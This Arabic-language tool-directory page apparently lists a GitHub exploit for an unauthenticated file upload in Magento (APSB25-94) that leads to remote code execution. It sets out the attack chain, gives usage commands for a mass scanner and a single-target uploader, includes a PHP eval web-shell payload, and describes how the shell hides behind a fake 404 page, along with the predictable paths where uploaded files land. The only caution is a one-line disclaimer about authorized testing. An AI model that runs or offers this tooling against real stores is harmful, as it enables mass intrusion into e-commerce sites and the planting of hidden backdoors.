Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-43990-Magento-RCE — Magento APSB25-94 رفع ملف غير مصادق عليه إلى RCE (CVE-2026-XXXX) - Eval Shell + Probe Scanner | Kitploit
أدوات/GitHubGitHub/amkkk221/cve-2025-43990-magento-rce
ماسحات الثغرات الأمنية للويبتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراق
GitHubamkkk221/cve-2025-43990-magento-rce

CVE-2025-43990-Magento-RCE

Magento APSB25-94 رفع ملف غير مصادق عليه إلى RCE (CVE-2026-XXXX) - Eval Shell + Probe Scanner

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Magento APSB25-94 — رفع ملف غير مصادق عليه إلى تنفيذ أوامر عن بعد (RCE)

نظرة عامة

يستغل ثغرة رفع ملف غير مصادق عليه في Magento / Adobe Commerce عبر واجهة REST API لعربة الضيف (guest cart) باستخدام رفع ملف custom_options.

سلسلة الهجوم

root@kitploit:~
1. GraphQL → leak product SKU
2. REST API → create guest cart
3. REST API → upload PNG polyshell via custom_options file_info
4. HTTP GET → access .php at predictable path
5. PHP exec → RCE

الأدوات

magento_godzilla.py — الماسح الدفعي

رفع على مرحلتين: ملف استكشاف (آمن من WAF) + شِل تقييم (تمويه 404).

root@kitploit:~
pip install requests
python magento_godzilla.py -f urls.txt -t 20 -o results.txt

المخرجات: RCE_CONFIRMED, SHELL_KILLED, PROBE_ONLY

magento_upload.py — رفع لهدف واحد

root@kitploit:~
python magento_upload.py -u https://target.com -f godzilla.php
python magento_upload.py -u https://target.com -c '<?php eval($_POST[1]);?>'
python magento_upload.py -u https://target.com -f shell.php --raw

مسارات الرفع

root@kitploit:~
/pub/media/custom_options/quote/{c1}/{c2}/{filename}
/media/custom_options/quote/{c1}/{c2}/{filename}

تمويه الشِل

تعيد GET 404 وهمي (HTTP 200 مع نص "Not Found"). ينفذ POST مع معامل كلمة المرور الشيفرة.

إخلاء مسؤولية

للاستخدام في اختبارات الأمن المصرح بها فقط.

تنزيل الأداة